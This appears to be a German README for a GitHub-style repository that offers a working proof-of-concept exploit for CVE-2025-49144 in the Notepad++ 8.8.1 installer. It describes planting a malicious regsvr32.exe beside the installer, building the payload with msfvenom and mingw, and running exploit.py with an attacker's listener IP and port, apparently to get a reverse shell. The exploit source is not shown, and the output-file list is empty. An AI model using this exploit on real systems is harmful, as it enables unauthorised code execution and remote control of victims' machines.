
Proof of Concept (PoC), das die CVE-2025-49144-Sicherheitslücke im Notepad++ 8.8.1-Installer ausnutzt.
Dieses Repository enthält einen funktionsfähigen Proof of Concept (PoC), der die CVE-2025-49144-Sicherheitslücke im Notepad++ 8.8.1-Installationsprogramm ausnutzt. Die schädliche Ausführung erfolgt, indem eine Binärdatei (regsvr32.exe) in dasselbe Verzeichnis wie das angreifbare Installationsprogramm gelegt wird. Wenn das Installationsprogramm ausgeführt wird, erbt es den Kontext und löst die Nutzlast aus.
⚠️ Haftungsausschluss
Dieser Code ist ausschließlich für Bildungs- und Forschungszwecke bestimmt. Die unbefugte Nutzung auf Systemen ohne ausdrückliche Genehmigung kann einen Gesetzesverstoß darstellen.
Der Autor ist nicht verantwortlich für jeglichen Missbrauch oder böswillige Aktivitäten im Zusammenhang mit diesem Werkzeug.
msfvenom (Teil des Metasploit Frameworks)mingw-w64 (x86_64-w64-mingw32-gcc)npp.8.8.1.Installer.x64.exe (muss manuell in dasselbe Verzeichnis gelegt werden)python3 exploit.py -i <LHOST> -p <LPORT>
Beispiel:
python3 exploit.py -i 192.168.100.10 -p 4444
Dies wird die folgenden Dateien erzeugen:
[
]